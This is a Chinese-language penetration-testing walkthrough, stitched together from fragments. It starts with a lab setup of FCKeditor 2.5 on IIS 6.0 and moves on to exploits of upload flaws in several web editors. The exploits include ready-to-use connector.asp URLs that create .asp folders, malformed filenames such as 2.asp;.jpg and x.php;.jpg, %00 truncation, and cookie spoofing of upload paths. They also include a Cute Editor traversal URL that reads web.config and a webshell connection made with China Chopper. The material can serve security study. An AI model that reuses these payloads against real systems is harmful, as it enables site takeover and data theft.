VM的Windows2003 FCKeditor_2.5
打开IIS,新建网站:
设置网站本地ip地址及端口:
主目录路径:
C:\wwwtest\1111\wwwwtest\FCKeditor
设置权限:
搭建完成。
FCKeditor/_whatsnew.html
http://10.0.0.101:91/_whatsnew.html
FCKeditor/_samples/default.html
http://10.0.0.101:91/_samples/default.html
- FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
-
- FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
-
- FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
-
- FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
-
- 由于这里用的是2.5的版本所以下面这条语句能用:
-
- http://10.0.0.101:91/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
照片格式木马无法上传:(木马写入照片可以上传)
然后上传2.asp;.jpg文件试试
发现他进行了过滤2.asp;.jpg改成了2_asp;.jpg,把点改成了下划线。审查元素看下图片的路径
asp文件并没有被解析成功
这就是fckeditor过滤"."为"_"的一个机制,想要突破的话有以下两种方式:
1.二次上传
第一次上传:2.asp;.jpg ==》2_asp;.jpg
第二次上传:2.asp;.jpg ==》2_asp;.jpg (不满足命名要求)
可能出现第二次命名为 2.asp;.(1).jpg,结果还是失败了被转义了:
2_asp;(1).jpg
2.新建上传
采用文件夹解析漏洞方式:
手动新建一个文件夹
发现他还是过滤了。那我们只有突破建立文件夹了。
执行以下地址就能成功创建文件夹:
- /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/lan.asp&NewFolderName=xx.asp
-
- 本网站为:
- http://10.0.0.101:91/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/lan.asp&NewFolderName=xx.asp
成功建立文件夹(绕过成功未被转义):
原因:
CurrentFolder:当前文件夹 未进行过滤(这个文件夹下的没有过滤)
NewFolderName:新建文件名 进行了过滤
在此文件夹下传文件都会被解析为asp脚本文件,如在lan.asp文件夹下上传3.jpg(asp木马文件):
在目标主机查看文件目录:
C:\wwwtest\1111\wwwwtest\FCKeditor\ 为网站根目录
阅览器访问查看是否可以解析asp木马:
http://10.0.0.101:91/userfiles/image/lan.asp/3.jpg
用菜刀连接3.jpg进行远程控制:(成功连接)
任意文件上传漏洞
其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞
然后修改文件名
1_php;1.jpg
利用iis6.0目录解析漏洞拿shell
创建目录/x.asp/
在目录下上传图片马即可拿shell
1_php;1.jpg
),结合IIS 6.0目录解析漏洞获取WebShell。首先登陆后台
利用编辑器上传
访问admin/southidceditor/admin_style.asp
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传
.asa
文件后缀上传,利用IIS解析漏洞。利用ii6.0文件名解析漏洞
上传图片改名为
x.php;20221.jpg获取shell
x.php;20221.jpg
。关键字:system_dntb/
确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具
cookie:UserType=0;IsEdition=0;Info=1;
uploadFolder=../system_dntb/Upload/;
路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞
两种利用方式
第一种是利用iis6.0文件名解析漏洞
xx.php;xx.jpg
第二种方式
%00截断
xx.php%00jpg
%00
截断。影响版本:
Cute Editor For Net 6.4
脆弱描述
可以随意查看网站文件内容,危害较大
攻击利用
http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config
Cute_Client?CuteEditor/Load.ashx
包含任意文件,如读取web.config
。
声明: